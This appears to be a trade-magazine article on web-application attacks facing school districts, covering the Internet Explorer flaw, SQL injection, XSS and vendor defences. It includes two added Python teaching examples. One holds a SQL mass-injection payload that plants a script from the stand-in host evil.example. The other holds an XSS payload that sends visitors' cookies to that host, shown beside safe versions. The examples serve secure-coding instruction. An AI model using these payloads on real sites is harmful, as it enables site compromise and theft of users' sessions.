IT Security: Target: The Web
No longer focused on the network,
hackers have a bull's eye now trained
squarely on web-based applications.
What, if anything, can school districts
do to thwart them?
IN DECEMBER, MICROSOFT ANNOUNCED a major security flaw affecting
its Internet Explorer web browser. The flaw allowed hackers to use hidden computer
code they had already injected into legitimate websites to steal the passwords of
visitors to those sites. Reportedly, more than 10,000 websites were infected with the
destructive code by the time Microsoft came forward with the news.
The announcement grabbed big headlines, emerging as it did during the Christmas
season while unsuspecting online shoppers were clicking away. As Eric Schultze, CTO
of Roseville, MN-based patch-management solutions provider Shavlik Technologies,
explained it, hackers were exploiting legitimate websites via SQL injection techniques.
"This means that visiting supposedly safe websites can lead to compromise via this
IE flaw," Schultze said at the time. "Attackers were able to exploit poor SQL coding
practices on these 'legit' sites that enable hackers to inject evil code on the websites."
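The mechanism Schultze describes, as an added example that is not part of the original article or of any vendor's code: a page-visit counter that splices a URL parameter into its SQL text, beside the parameterised version that closes the hole. The site, its table and the attacker payload are all constructed for the demonstration (the host name evil.example is a placeholder), and Python's sqlite3 module stands in for the site's database. Because sqlite3's execute() refuses stacked statements, the vulnerable function uses executescript() to model a database driver that, like the ones behind the compromised sites in the story, runs every statement in the string.

```python
import sqlite3


def setup_site():
    """Constructed sample site: an in-memory table of pages with a visit counter."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (slug TEXT PRIMARY KEY, body TEXT, views INTEGER)")
    conn.executemany(
        "INSERT INTO pages VALUES (?, ?, 0)",
        [("home", "<h1>Welcome</h1>"), ("about", "<p>About us</p>")],
    )
    conn.commit()
    return conn


# Constructed attacker input, sent as the value of the page-slug URL parameter.
# It closes the slug string, adds a second statement that appends a script tag to
# every page body, and uses the application's own trailing quote to finish cleanly.
# "evil.example" is a placeholder host, not a real malware server.
MASS_INJECTION_PAYLOAD = (
    "x'; UPDATE pages SET body = body || "
    "'<script src=\"http://evil.example/k.js\"></script>' WHERE '1' = '1"
)


def record_visit_vulnerable(conn, slug):
    """Counts a visit by splicing the request parameter into the SQL text.

    executescript() models a database driver that runs every statement in the
    string (stacked queries); sqlite3's execute() would refuse the second one.
    """
    sql = "UPDATE pages SET views = views + 1 WHERE slug = '%s'" % slug
    conn.executescript(sql)
    conn.commit()


def record_visit_safe(conn, slug):
    """Same operation with a bound parameter: the value never becomes SQL text."""
    conn.execute("UPDATE pages SET views = views + 1 WHERE slug = ?", (slug,))
    conn.commit()


def page_body(conn, slug):
    """The HTML a later visitor to this page would be served."""
    row = conn.execute("SELECT body FROM pages WHERE slug = ?", (slug,)).fetchone()
    return row[0] if row else None


def visit_count(conn, slug):
    """Current value of the visit counter for a page."""
    row = conn.execute("SELECT views FROM pages WHERE slug = ?", (slug,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    site = setup_site()
    record_visit_vulnerable(site, MASS_INJECTION_PAYLOAD)
    print(page_body(site, "home"))  # every page now ends with the attacker's script tag

    site = setup_site()
    record_visit_safe(site, MASS_INJECTION_PAYLOAD)
    print(page_body(site, "home"))  # unchanged: no page has that literal slug
```

Nothing in the payload touches the counter feature itself; the attacker only needs one spot where request data is pasted into a statement and a driver that keeps executing past the first semicolon. The bound-parameter version treats the whole payload as a slug value, finds no such page, and changes nothing.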
The fix was simple enough, and Microsoft provided a downloadable security patch
in record time. Schultze described the company's reaction to the vulnerability as an
"all-hands-on-deck response" that was "quite disruptive to its own processes." But the
flaw gave critics of the Redmond, WA-based technology empire an excuse to engage
in some full-throated Microsoft bashing.
Lost in the hubbub and faultfinding, says web-application security expert Billy Hoffman,
was a larger problem.
"These kinds of exploits come and go," Hoffman says.
"Next, it'll be a Firefox flaw. A couple of weeks ago it was a
problem with QuickTime. At the end of the day, the interesting
thing about this IE security issue is that it wasn't about
somebody e-mailing you a trojaned WMF image file. Now
attackers are setting bear traps on websites."
Hoffman manages HP's Web Security Research Group.
Formerly a security researcher for SPI Dynamics (which HP
acquired in 2007), he earned hacker street cred during his college
days at Georgia Tech when he uncovered a security flaw
in the school's magnetic ID card system. He later developed a
suite of research tools for capturing, modifying, and validating
data from magnetic stripe cards, called Stripe Snoop.
"Within a day or two, at least 6,000 websites had been
hacked," Hoffman says, explaining the lethal swiftness of the
IE attack. "That's an extremely fast turnaround time. Hackers
were able to act that quickly because these websites had
already been compromised. They had exploit kits just sitting
there on the web servers, and the attackers just basically
updated them to begin serving this IE exploit. It shows how
automated these exploits have become." (Exploit kits are packaged attack tools
that sit on compromised web servers, probe each visitor's browser and plug-ins
for known flaws, and deliver a matching exploit. MPack, IcePack, and Neosploit
are among the best known.)
Hoffman sees the speed with
which attackers exploited the IE flaw as emblematic of a
frightening trend-- one that is colliding with an even scarier
one: Hackers are targeting weaknesses in the application layer.
And they are not planting the usual viruses or trojans that antivirus software
or a perimeter firewall can screen out, but are mounting an emerging
species of attack that grows out of the inherent nature of applications
that live on the web. "Hackers have compromised hundreds
of thousands of legitimate websites through web-app vulnerabilities,"
Hoffman says, "and they are using those compromised
sites to serve malware to visitors."
This is a worrying development for educators who use online
educational software and content. What can K-12 technology
managers do to cope with this new line of cyber attack?
Controlling the Uncontrollable
"Unfortunately, there's really not much you can do," Hoffman
says, "because attackers are starting to target sites you trust. USA
Today's website was used to serve malware earlier this year. It's
not like you can say, 'Don't visit sites that have URLs ending in
.ua for the Ukraine.' You can get hit on legitimate sites."
There may not be much a district can do, but there is something,
says Paul Myer, senior vice president of corporate development
at Orange, CA-based security solutions provider Marshal8e6.
(The company is a merger of the two internet security firms
Marshal and 8e6 Technologies, a deal struck last November.)
Web-app vulnerabilities, Myer says, are part of the evolving
landscape of threats, and cyber security evolves right along with
it. A case in point he cites is Henrico County Public Schools,
which found at least part of the answer in a filtering tool it
employed to protect students in its 1-to-1 laptop program from
inappropriate and malicious web content. In 2001, the Richmond,
VA, district began distributing laptops to its teachers,
staff, and secondary students. By 2007, the school had gotten
laptops into the hands of approximately 27,600 middle and
high school students and teachers at 66 schools.
To provide security for the program, and in particular to
comply with the Children's Internet Protection Act (CIPA),
which mandates that federally funded schools install internet
filters to protect students from unsafe online content, the district
turned to Marshal8e6. The vendor's Mobile Client program,
which Henrico County deployed, is designed to prevent off-site
students from accessing inappropriate content (pornography, hate
speech, etc.), but also from malicious, web-based code.
"In education you have an interesting confluence of factors,"
says Myer. "You have curious students with lots of imagination,
good equipment at their fingertips, and lots of time on
their hands."
And they have MySpace, which hit the district's network
like what Henrico County Systems Administrator Jason Cope
calls an overnight explosion. Through MySpace, students have
unlimited access to e-mail, instant messaging, blogs, and
photo galleries. "Suddenly, everyone was trying to use
[MySpace], and there was a plethora of hits to multiple points
of entry for the site," Cope says.
The increased traffic degraded the district's internet access to
educational applications and increased its exposure to malicious
code. Henrico County eventually turned to another Marshal8e6
product, the R3000 internet filter. The standalone filtering
appliance utilizes a pattern-detection capability to sort out and
block three types of web applications: streaming media applications,
remote access control applications, and online games.
A complementary strategy lies at the heart of San Ramon, CA-based
Faronics' aptly named Anti-Executable, an application-control tool
designed specifically to shield school computers from unauthorized
executable code. The product works from a white list, a roster
of authorized programs that district tech managers and IT
administrators control; anything not on the roster is blocked by default.
"If an executable shows up and it's not on the white list, the
product keeps that code from running," explains company
spokesperson Dheeraj Mahtani. "We think this approach is especially
useful in K-12 environments. It ensures that students have
access to the productive programs they need while preventing
anything that's unwanted in the classroom from running."
Along with Anti-Executable, Faronics offers a product called
Deep Freeze that allows users what you might call a do-over in
the event of a strike from hackers. Upper Dauphin Area School
District uses both tools to secure its students' computers.
The district comprises an elementary, middle, and high
school located in Elizabethville, PA. It supports 500-plus student
and teacher workstations running Microsoft Windows
XP, and 19 servers. Tainted software had become an especially
serious problem in the high school computing labs, according
to district Technology Director Bryan Campbell. The advanced
computing abilities of some ill-intentioned students allowed
them to create larger workstation disruptions, Campbell says.
The district's effort to "bring control to an uncontrolled
environment," as he terms it, was straining its IT resources.
Software that restricts what users can do and access did help
the district prevent several forms of system damage-- for a
while. But Campbell says this approach was difficult and
time-consuming, and at the end of the day, the students were
just too adept at circumventing it.
Deep Freeze is a reboot-to-restore tool that takes a snapshot
of the computer and "freezes" it into a protected state. Any
changes made to that snapshot can be undone by the program
and the computer returned to that original frozen state.
"It's just a fact that computers in education environments are
among the toughest to manage and secure," Mahtani says. "Lots
of different daily users and limited on-site staff support for what
are often large numbers of machines create a kind of IT perfect
storm. Deep Freeze allows administrators to set up a machine
and walk away. The protection takes place on the restart."
Are Programmers to Blame?
The rise of web apps as the No. 1 avenue of malicious hacker
attack is old news to Gary McGraw, who has been preaching
application security for years. He's the author or co-author of
six bestselling books on the subject, including the now-classic
Exploiting Software: How to Break Code (Addison-Wesley
Professional, 2004), which he wrote with Greg Hoglund, the
founder of Rootkit.com, a clearinghouse of information about
rootkits and anti-rootkits. His latest book, also written with
Hoglund, is Exploiting Online Games: Cheating Massively
Distributed Systems (Addison-Wesley Professional, 2007).
McGraw is also the CTO of Cigital, a Dulles, VA-based
provider of software quality and security solutions.
Why Web Apps Are So Vulnerable
WEB APPLICATIONS HAVE BECOME RIPE for attack thanks in part,
some computer security experts say, to the enormous popularity of a
development technique known as Ajax, which utilizes the JavaScript
dynamic scripting language.
Ajax creates highly interactive web pages through the combination
of several technologies in addition to JavaScript, including
XML and HTML.
And therein lies the problem, says security expert Brian Chess.
"JavaScript is very hard to secure, and nowadays it's everywhere
on the web," he says. "And the fact that Ajax proponents are not
acknowledging the problem isn't making it any easier.We need to
stop teaching people to make use of these new web technologies
while pretending that there are no security considerations.With new
technologies comes a new set of threats."
Veritable throngs of web-app developers are now using Ajax to
improve the responsiveness of web pages by automating the exchange
of information between browsers and servers. The result has been a
greatly improved user experience-- and a wider attack surface. By
2006, attackers were routinely exploiting cross-site scripting
(XSS) vulnerabilities in dynamic websites. In an XSS attack, a web
application that fails to encode visitor-supplied input echoes the
attacker's script into a page it serves to an unsuspecting end user.
Because the script arrives as part of the trusted site's own page, the
user's browser runs it with that site's privileges, giving the
attacker access to cookies, session tokens, and other sensitive
information. What's the consequence for the website visitor? Theft
of data, mainly. And there will be no hint of trouble, so he won't
know he's been compromised.
According to Wikipedia,
as of 2007, cross-site scripting carried out on
websites made up about 80 percent of all documented
security vulnerabilities.
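The encoding step that stops the XSS attack the sidebar describes, as an added example written for this article rather than code from the page or from any of the vendors quoted: the same search page rendered three ways, against two constructed attacker inputs (the host evil.example is a placeholder). The half-fixed version shows a common mistake: encoding only the angle brackets stops a script tag in element text, but a value dropped into an HTML attribute can still break out of the quotes. The helper renders_attacker_markup is a crude string check written for the demo, not a real scanner.

```python
import html

# Constructed attacker inputs; "evil.example" is a placeholder host.
# 1) Script injected into text: ships the visitor's cookies to the attacker.
COOKIE_THIEF = (
    "<script>new Image().src='http://evil.example/c?'+document.cookie</script>"
)
# 2) Attribute breakout: no angle brackets at all, just a closing quote and an
#    event handler that fires as soon as the field gets focus.
ATTR_BREAKOUT = '" onfocus="alert(document.cookie)" autofocus="'

# The visitor's search term lands in two contexts: element text and an attribute.
TEMPLATE = '<p>Results for {q}</p>\n<input name="q" value="{q}">'


def search_page_vulnerable(query):
    """Echoes the search term exactly as the visitor sent it."""
    return TEMPLATE.format(q=query)


def search_page_half_fixed(query):
    """Encodes only & < >. Stops a script tag in text; attribute breakout survives."""
    return TEMPLATE.format(q=html.escape(query, quote=False))


def search_page_safe(query):
    """Encodes & < > and both quote characters, covering both contexts used here."""
    return TEMPLATE.format(q=html.escape(query, quote=True))


def renders_attacker_markup(page):
    """Crude string check for the demo: is a raw script tag or a raw event-handler
    attribute present in the rendered HTML? Real scanners parse the DOM instead."""
    lowered = page.lower()
    return "<script" in lowered or ' onfocus="' in lowered


if __name__ == "__main__":
    renderers = [
        ("vulnerable", search_page_vulnerable),
        ("half-fixed", search_page_half_fixed),
        ("safe", search_page_safe),
    ]
    for name, render in renderers:
        for payload in (COOKIE_THIEF, ATTR_BREAKOUT):
            page = render(payload)
            print(f"{name:10s} {renders_attacker_markup(page)!s:5s} "
                  f"{page.splitlines()[-1]}")
```

The rule the example illustrates is that output encoding has to match the context the data lands in. Element text and quoted attributes are covered by full HTML entity encoding; a value written into a URL, a JavaScript string, or a JSON response consumed by Ajax code needs the encoding of that context instead, which is why a single global filter on input rarely holds up.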
"Bad software is the root of all evil," McGraw says. "And
it's the true root of most IT security problems." These days, he
explains, the black hats aren't getting at you by breaching
some network security mechanism, but by leveraging the
functionality of an application.
"For many years, security was about operations-- about
infrastructure and the people who keep the network going,"
McGraw says. "Today the problem is about the vulnerable
software the operations managers have to deal with. They get
this broken stuff, and they know it's broken, but they don't
know how to fix it because they're not software guys, so they
just put something around it, like an application firewall, or
maybe they poke it a couple times to see how broken it really
is with some black-box testing tools. Unfortunately, operations
cannot solve this problem. The only people who can solve it
are the software builders of the world."
Brian Chess, chief scientist
and co-founder of Fortify Software,
a Palo Alto, CA-based
provider of enterprise application
security solutions, agrees. "Whether they know it or not, computer
security is largely in the hands of programmers," he says.
Chess is the co-author of Secure Programming With Static
Analysis (Addison-Wesley Professional, 2007), which he wrote
with Jacob West, and his work at the University of California-
Santa Cruz led to the development of Eau Claire, a framework
for detecting and eliminating security vulnerabilities in software.
"One of our problems with security these days is that it's just
too darned hard," Chess says. "It's very difficult to write a program
that's secure. We're all about helping developers get it right
the first time, but it's a big challenge for everyone. If there were
some easy, take-a-pill kind of solution to the software security
problem, you'd better believe everyone would be doing it."
Many application-layer attacks are aimed at certain well known
but unfortunately still common types of coding errors
pertaining to the way web applications process input from
website visitors, HP's Hoffman explains. "A simple e-commerce
application typically asks users for various kinds of information--
passwords, addresses, etc.-- and without the appropriate
safeguards, hackers can try to use those input fields to pass
malicious instructions to the host computer."
In their latest quarterly report, security analysts at Santa Clara,
CA-based Cenzic Intelligent Analysis Lab found that SQL injection
(34 percent) and cross-site scripting (23 percent) are the two most
common classes of web-application vulnerability, and thus the two most
common routes by which attackers get malicious code into web-based
applications. The study also found that vulnerabilities in
media players are opening a widening security hole that school
districts need to be aware of, given the role that media players
have in presenting online educational content. These programs
account for between 2 and 5 percent of the total web-application
vulnerability volume during any given quarter, Cenzic reports.
Seven percent of the vulnerabilities pertain to web servers,
and 4 percent to web browsers. Among browsers, it wasn't Internet
Explorer that had the most reported vulnerabilities, but Mozilla's
Firefox, which led by far at 41 percent. The Opera browser was
second at 26 percent. IE accounted for just 17 percent, and Apple's
Safari had the fewest reported vulnerabilities at 16 percent. (A count
of published vulnerabilities reflects how intensively a product is
studied as well as how well it is built, so it is a rough measure of
exposure at best.)
Security consultant and trainer Dinis Cruz recognizes the soft
spot in the application layer, but he stops short of putting the
onus on the developers. Cruz, who specializes in web application
security, is the chief security evangelist of the Open Web
Application Security Project, an open web-based community
focused on finding and fighting the causes of insecure software.
"We're in the process of building a world in which all the code
we run on our websites has the power to access all of our assets
from our desktops and servers," Cruz says. "From a security
point of view, this is a very bad development. But we shouldn't
use the developers as the scapegoats. They often simply don't
have enough visibility into what they are creating to evaluate
the security of an application. And remember, they're paid
for features and speed, not security."
"I don't want to blame the developers
either," Chess adds. "There isn't a
great roadmap through Web 2.0 territory,
so there's this temptation to pretend that you can take care
of the security part later. But if there's one thing history tells us,
it's that that kind of thinking can really get us into trouble."
Cruz is especially worried about the new web-app frameworks--
such as Adobe's AIR (Adobe Integrated Runtime), Sun's
JavaFX, and Microsoft's Silverlight. "The feeling now is, hey,
the new paradigm is just the desktop application," he says. "The
user installs it and clicks yes, so the vendor is covered, but then
those things have access to all the user's resources."
"Ultimately, it's the developer who has to fix this," HP's
Hoffman says. "The IT security guys are doing their job. They set
up firewall rules, secure the perimeter, and implement anti-spam
and antivirus protection. But they're just securing the infrastructure
that's serving you an application. If that application
is broken, old, or insecure in some way, there's no magical
box that your IT guy can [install] to protect you.
"This is the world we now live in," Hoffman goes on.
"Attackers are using web-app vulnerabilities to compromise
sites, and then use those sites to lay land mines or bear traps to
nail unsuspecting people coming by. There's always going to be
this game of Whack-a-Mole around IE exploits-- or QuickTime
or Firefox or Flash. But if we can secure these applications--
these online services that everyone uses and trusts-- there won't
be any platforms for people to get attacked from."
Web Extras: For more information on IT security, visit www.thejournal.com
and click Security/Privacy in the Browse by Topic menu.
John K. Waters is a freelance writer based in Palo Alto, CA.